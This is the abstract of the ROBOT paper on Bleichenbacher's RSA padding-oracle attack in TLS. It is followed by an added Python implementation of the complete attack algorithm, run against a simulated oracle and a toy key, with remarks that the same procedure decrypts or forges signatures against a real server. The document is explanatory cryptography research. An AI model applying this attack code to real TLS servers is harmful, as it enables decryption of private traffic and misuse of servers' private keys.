Return Of Bleichenbacher's Oracle Threat (ROBOT)

Hanno Böck, Juraj Somorovsky, Craig Young

27th USENIX Security Symposium (USENIX Security 18)


Abstract

In 1998 Bleichenbacher presented an adaptive chosen-ciphertext attack on the RSA PKCS#1 v1.5 padding scheme. The attack exploits the availability of a server which responds with different messages based on the ciphertext validity. This server is used as an oracle and allows the attacker to decrypt RSA ciphertexts. Given the importance of this attack, countermeasures were defined in TLS and other cryptographic standards using RSA PKCS#1 v1.5.

We perform the first large-scale evaluation of Bleichenbacher's RSA vulnerability. We show that this vulnerability is still very prevalent on the Internet and affected almost a third of the top 100 domains in the Alexa Top 1 Million list, including Facebook and PayPal.

We identified vulnerable products from nine different vendors and open source projects, among them F5, Citrix, Radware, Palo Alto Networks, IBM, and Cisco. These implementations provide novel side channels for constructing Bleichenbacher oracles: TCP resets, TCP timeouts, or duplicated alert messages. In order to prove the importance of this attack, we demonstrated practical exploitation by signing a message with the private key of facebook.com's HTTPS certificate. Finally, we discuss countermeasures against Bleichenbacher attacks in TLS and recommend deprecating the RSA encryption key exchange in TLS and the RSA PKCS#1 v1.5 standard.
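The two paragraphs above describe the attack only at the level of "a server that answers differently for valid and invalid padding is an oracle, and the oracle lets the attacker decrypt". The following Python is an added example, not code from the paper or its authors, that carries the idea through: it implements Bleichenbacher's 1998 algorithm against a stand-in padding oracle, a function that answers whether a chosen ciphertext decrypts to a block beginning with 00 02. That boolean is the role the TCP resets, timeouts and duplicated alerts played for the servers in the paper. Everything here is constructed for illustration: the RSA modulus is the product of two Mersenne primes (about 150 bits, so the run takes seconds), the padding bytes come from a seeded PRNG, and the oracle checks only the first two bytes, which is the weakest check an implementation can make and therefore the strongest oracle for the attacker. The blinding step of the original algorithm is skipped because the ciphertext already encrypts a conforming block; with blinding, the same procedure computes c^d mod n for an arbitrary c, which is why such an oracle also lets an attacker sign with the server's key.

```python
"""Toy Bleichenbacher (1998) adaptive chosen-ciphertext attack on PKCS#1 v1.5.
Added example, not code from the ROBOT paper. The modulus is a constructed toy (two
Mersenne primes, ~150 bits) so the attack runs in seconds; a real key only makes the
numbers bigger, the algorithm is identical."""
import random

random.seed(1)  # deterministic padding bytes, so the run is reproducible

P, Q = (1 << 61) - 1, (1 << 89) - 1  # Mersenne primes M61 and M89: toy key only
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8        # modulus length in bytes (19)

def pkcs1_pad(msg, k=K):
    """EME-PKCS1-v1_5 encoding: 00 02 <non-zero random PS> 00 <msg>, k bytes."""
    assert len(msg) <= k - 11, "message too long for the modulus"
    ps = bytes(random.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg

def pkcs1_unpad(block):
    if block[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    return block[block.index(b"\x00", 2) + 1:]

class PaddingOracle:
    """Stands in for a server that reveals whether a decrypted block starts with
    00 02. In ROBOT that signal was a distinct or duplicated alert, a TCP reset or
    a timeout; here it is just the return value. Counts queries for the record."""
    def __init__(self, n=N, d=D):
        self.n, self.d, self.k = n, d, (n.bit_length() + 7) // 8
        self.queries = 0
    def __call__(self, c):
        self.queries += 1
        return pow(c, self.d, self.n).to_bytes(self.k, "big")[:2] == b"\x00\x02"

def _ceil_div(a, b):
    return -(-a // b)

def _merge(intervals):  # union of closed integer intervals, overlaps merged
    out = []
    for lo, hi in sorted(intervals):
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out

def bleichenbacher(oracle, n, e, c):
    """Recover m = c^d mod n from the oracle alone (step numbers as in the paper).
    Step 1 (blinding) is skipped because c already encrypts a conforming block."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))             # conforming plaintexts lie in [2B, 3B)
    def conforming(s):                 # does c * s^e decrypt to 00 02 ...?
        return oracle((c * pow(s, e, n)) % n)
    assert conforming(1)
    M = [(2 * B, 3 * B - 1)]
    s = _ceil_div(n, 3 * B)            # step 2a: smallest s giving a conforming product
    while not conforming(s):
        s += 1
    while True:
        new = []                       # step 3: narrow every interval using s
        for a, b in M:
            for r in range(_ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo = max(a, _ceil_div(2 * B + r * n, s))
                hi = min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = _merge(new)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]             # step 4: interval collapsed to m (s0 = 1)
        if len(M) > 1:                 # step 2b: several intervals, linear search
            s += 1
            while not conforming(s):
                s += 1
        else:                          # step 2c: one interval, halve it each round
            a, b = M[0]
            r = _ceil_div(2 * (b * s - 2 * B), n)
            while True:
                lo_s = _ceil_div(2 * B + r * n, b)
                hi_s = (3 * B - 1 + r * n) // a
                hit = next((t for t in range(lo_s, hi_s + 1) if conforming(t)), None)
                if hit is not None:
                    s = hit
                    break
                r += 1

def demo(message=b"hello"):
    """Encrypt `message` under the toy key, then recover it using only the oracle."""
    c = pow(int.from_bytes(pkcs1_pad(message), "big"), E, N)
    oracle = PaddingOracle()
    m = bleichenbacher(oracle, N, E, c)
    return pkcs1_unpad(m.to_bytes(K, "big")), oracle.queries
```

`demo()` returns the recovered plaintext together with the number of oracle queries it took; with this toy modulus most of the queries are spent in step 2a, where the attacker scans for the first multiplier that produces a conforming product. Against a real server each query is one TLS handshake whose outcome (alert, duplicated alert, reset or timeout) has to be classified, which is exactly the side-channel work the paper describes; the arithmetic above does not change.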

[Attack website]

Tags: Bleichenbacher, side channel, TLS